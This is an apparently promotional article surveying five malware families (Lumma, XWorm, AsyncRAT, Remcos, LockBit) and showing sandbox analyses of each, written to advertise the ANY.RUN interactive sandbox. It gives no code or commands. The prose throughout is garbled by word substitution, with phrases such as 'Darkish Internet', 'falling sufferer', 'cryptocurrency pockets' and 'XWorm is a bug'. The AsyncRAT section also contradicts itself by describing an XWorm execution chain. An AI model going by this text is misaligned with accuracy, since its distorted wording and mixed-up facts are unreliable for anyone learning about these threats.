2024 had its fair proportion of high-profile cyber assaults, with corporations as massive as Dell and TicketMaster falling sufferer to information breaches and different infrastructure compromises. In 2025, this pattern will proceed. So, to be ready for any form of malware assault, each group must know its cyber enemy upfront. Listed here are 5 widespread malware households which you can begin getting ready to counter proper now.
Lumma
Lumma is a broadly accessible malware designed to steal delicate info. It has been overtly offered on the Darkish Internet since 2022. This malware can successfully accumulate and exfiltrate information from focused functions, together with login credentials, monetary info, and private particulars.
Lumma is commonly up to date to reinforce its capabilities. It will probably log detailed info from compromised methods, resembling shopping historical past and cryptocurrency pockets information. It may be used to put in different malicious software program on contaminated units. In 2024, Lumma was distributed by varied strategies, together with faux CAPTCHA pages, torrents, and focused phishing emails.
Evaluation of a Lumma Assault
Proactive evaluation of suspicious recordsdata and URLs inside a sandbox surroundings can successfully enable you stop Lumma an infection.
Let’s examine how you are able to do it utilizing ANY.RUN’s cloud-based sandbox. It not solely delivers definitive verdicts on malware and phishing together with actionable indicators but additionally permits real-time interplay with the menace and the system.
Check out this evaluation of a Lumma assault.
 |
| ANY.RUN enables you to manually open recordsdata and launch executables |
It begins with an archive which incorporates an executable. As soon as we launch the .exe file, the sandbox robotically logs all processes and community actions, exhibiting Lumma’s actions.
 |
| Suricata IDS informs us a couple of malicious connection to Lumma’s C2 server |
It connects to its command-and-control (C2) server.
 |
| Malicious course of accountable for stealing information from the system |
Subsequent, it begins to gather and exfiltrate information from the machine.
 |
| You should utilize the IOCs extracted by the sandbox to reinforce your detection methods |
After ending the evaluation, we are able to export a report on this pattern, that includes all of the essential indicators of compromise (IOCs) and TTPs that can be utilized to counterpoint defenses towards attainable Lumma assaults in your group.
Strive all options of ANY.RUN’s Interactive Sandbox without spending a dime with a 14-day trial
XWorm
XWorm is a bug that provides cybercriminals distant management over contaminated computer systems. First showing in July 2022, it may accumulate a variety of delicate info, together with monetary particulars, shopping historical past, saved passwords, and cryptocurrency pockets information.
XWorm permits attackers to watch victims’ actions by monitoring keystrokes, capturing webcam photos, listening to audio enter, scanning community connections, and viewing open home windows. It will probably additionally entry and manipulate the pc’s clipboard, probably stealing cryptocurrency pockets credentials.
In 2024, XWorm was concerned in lots of large-scale assaults, together with ones that exploited CloudFlare tunnels and bonafide digital certificates.
Evaluation of a XWorm Assault
 |
| Phishing emails are sometimes the preliminary stage of XWorm assaults |
In this assault, we are able to see the unique phishing e-mail, which incorporates a hyperlink to a Google drive.
 |
| A Google Drive web page with a obtain hyperlink to a malicious archive |
As soon as we observe the hyperlink, we’re supplied to obtain an archive which is protected with a password.
 |
| Opened malicious archive with a .vbs file |
The password could be discovered within the e-mail. After getting into it, we are able to entry a .vbs script contained in the .zip file.
 |
| XWorm makes use of MSBuild.exe to persist on the system |
As quickly as we launch the script, the sandbox immediately detects malicious actions, which ultimately result in the deployment of XWorm on the machine.
AsyncRAT
AsyncRAT is one other distant entry trojan on the record. First seen in 2019, it was initially unfold by spam emails, typically exploiting the COVID-19 pandemic as a lure. Since then, the malware has gained recognition and been utilized in varied cyber assaults.
AsyncRAT has advanced over time to incorporate a variety of malicious capabilities. It will probably secretly file a sufferer’s display exercise, log keystrokes, set up extra malware, steal recordsdata, keep a persistent presence on contaminated methods, disable safety software program, and launch assaults that overwhelm focused web sites.
In 2024, AsyncRAT remained a big menace, typically disguised as pirated software program. It was additionally one of many first malware households to be distributed as a part of advanced assaults involving scripts generated by AI.
Evaluation of an AsyncRAT Assault
 |
| The preliminary archive with an .exe file |
In this evaluation session, we are able to see one other archive with a malicious executable inside.
 |
| A PowerShell course of used for downloading a payload |
Detonating the file kicks off the execution chain of XWorm, which entails the usage of PowerShell scripts to fetch extra recordsdata wanted to facilitate the an infection.
As soon as the evaluation is completed, the sandbox shows the ultimate verdict on the pattern.
Remcos
Remcos is a malware that has been marketed by its creators as a legit distant entry software. Since its launch in 2019, it has been utilized in quite a few assaults to carry out a variety of malicious actions, together with stealing delicate info, remotely controlling the system, recording keystrokes, capturing display exercise, and so forth.
In 2024, campaigns to distribute Remcos used strategies like script-based assaults, which frequently begin with a VBScript that launches a PowerShell script to deploy the malware, and exploited vulnerabilities like CVE-2017-11882 by leveraging malicious XML recordsdata.
Evaluation of a Remcos Assault
 |
| Phishing e-mail opened in ANY.RUN’s Interactive Sandbox |
In this instance, we’re met with one other phishing e-mail that incorporates a .zip attachment and a password for it.
 |
| cmd course of used through the an infection chain |
The ultimate payload leverages Command Immediate and Home windows system processes to load and execute Remcos.
 |
| MITRE ATT&CK matrix offers a complete view of the malware’s strategies |
The ANY.RUN sandbox maps the whole chain of assault to the MITRE ATT&CK matrix for comfort.
LockBit
LockBit is a ransomware primarily concentrating on Home windows units. It’s thought of one of many greatest ransomware threats, accounting for a considerable portion of all Ransomware-as-a-Service (RaaS) assaults. The decentralized nature of the LockBit group has allowed it to compromise quite a few high-profile organizations worldwide, together with the UK’s Royal Mail and India’s Nationwide Aerospace Laboratories (in 2024).
Regulation enforcement companies have taken steps to fight the LockBit group, resulting in the arrest of a number of builders and companions. Regardless of these efforts, the group continues to function, with plans to launch a brand new model, LockBit 4.0, in 2025.
Evaluation of a LockBit Assault
 |
| LockBit ransomware launched within the secure surroundings of the ANY.RUN sandbox |
Take a look at this sandbox session, exhibiting how briskly LockBit infects and encrypts recordsdata on a system.
 |
| ANY.RUN’s Interactive Sandbox enables you to see static evaluation of each modified file on the system |
By monitoring file system modifications, we are able to see it modified 300 recordsdata in lower than a minute.
 |
| Ransom be aware tells victims to contact attackers |
The malware additionally drops a ransom be aware, detailing the directions for getting the info again.
Enhance Your Proactive Safety with ANY.RUN’s Interactive Sandbox
Analyzing cyber threats proactively as a substitute of reacting to them as soon as they develop into an issue to your group is the perfect plan of action any enterprise can take. Simplify it with ANY.RUN’s Interactive sandbox by inspecting all suspicious recordsdata and URLs inside a secure digital surroundings that helps you establish malicious content material with ease.
With the ANY.RUN sandbox, your organization can:
- Swiftly detect and ensure dangerous recordsdata and hyperlinks throughout scheduled checks.
- Examine how malware operates on a deeper degree to disclose its techniques and techniques.
- Reply to safety incidents extra successfully by amassing essential menace insights by sandbox evaluation.
